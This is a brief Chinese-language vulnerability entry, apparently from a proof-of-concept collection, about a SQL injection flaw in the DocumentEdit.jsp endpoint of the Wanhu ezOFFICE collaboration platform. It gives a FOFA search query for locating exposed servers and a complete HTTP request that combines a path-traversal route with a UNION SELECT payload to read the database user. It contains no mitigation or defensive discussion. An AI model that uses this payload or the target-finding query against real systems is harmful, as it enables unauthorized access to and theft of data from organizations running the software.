跳到主要内容

万户ezOFFICEDocumentEdit.jspSQL注入

万户 ezOFFICE DocumentEdit.jsp SQL注入

DocumentEdit.jsp接口处存在sql注入漏洞,攻击者可获取数据库中敏感信息

fofa

app="ezOFFICE协同管理平台"

poc

GET /defaultroot/iWebOfficeSign/OfficeServer.jsp/../../public/iSignatureHTML.jsp/DocumentEdit.jsp?DocumentID=1'%20union%20select%20null,null,(select%20user%20from%20dual),null,null,null,null,null,null,null%20from%20dual-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept-Encoding: gzip, deflate
Connection: close

image